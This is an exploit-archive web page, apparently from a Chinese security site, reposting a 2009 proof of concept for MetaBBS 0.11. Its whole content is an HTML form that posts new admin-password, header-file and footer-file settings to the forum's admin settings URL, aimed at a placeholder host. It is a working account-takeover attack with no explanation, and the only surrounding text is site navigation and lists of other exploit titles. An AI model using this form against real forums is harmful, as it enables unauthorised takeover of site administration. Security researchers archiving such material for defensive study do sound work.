首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MetaBBS version 0.11 change administrative password exploit
来源:make0day[at]gmail.com 作者:make0day 发布时间:2009-02-05  
Metabbs 0.11
2008-08-06 19:56


<form method="post" action="http://test.com/metabbs/admin/settings/?">
<dl>
	<dt><label for="settings_admin_password">Admin password</label></dt>
	<dd><input id="settings_admin_password" size="20" name="settings[admin_password]" value="" type="password" /></dd>
	
	<dt><label for="settings_global_header">Header file</label></dt>
	<dd><input id="settings_global_header" size="30" name="settings[global_header]" value="" type="text" /></dd>

	<dt><label for="settings_global_footer">Footer File</label></dt>
	<dd><input id="settings_global_footer" size="30" name="settings[global_footer]" value="" type="text" /></dd>

	<dt><label for="settings_theme">Site theme</label></dt>
	<dd><input id="settings_theme" size="30" name="settings[theme]" value="" type="text" /></dd>

	<dt><label for="settings_default_language">Language</label></dt>
	<dd>
		<dd><input id="ettings_default_language" size="30" name="settings[default_language]" value="" type="text" /></dd>
		<input name="settings[always_use_default_language]" value="0" type="hidden" /><input id="settings_always_use_default_language" name="settings[always_use_default_language]" value="1" type="checkbox" />		
	<label for="settings_always_use_default_language">Always Use Default Language</label>	</dd>

	<dt><label for="settings_timezone">TimeZone</label></dt>
	<dd>
		<dd><input id="settings_timezone" size="30" name="settings[timezone]" value="" type="text" /></dd>
</dl>

<h2>Advanced Setting</h2>
<p><input name="settings[force_fancy_url]" value="0" type="hidden" />
<input id="settings_force_fancy_url" name="settings[force_fancy_url]" value="1" type="checkbox" /> 
<label for="settings_force_fancy_url">Fancy URL Force Apply</label></p>

<p><input type="submit" value="OK" /></p>
</form>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·StreamDown version 6.4.3 local
·Euphonics Audio Player v1.0 (.
·LCPlayer proof of concept deni
·Nokia Multimedia Player versio
·Amaya Web Browser 11 (bdo tag)
·UltraVNC/TightVNC Multiple VNC
·Amaya Web Browser 11 (bdo tag)
·Free Download Manager 2.5/3.0
·dBpowerAMP Audio Player 2 .PLS
·Novell GroupWise <= 8.0 Malfor
·FeedMon 2.7.0.0 outline Tag Bu
·YapBB <= 1.2 (forumID) Blind S
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved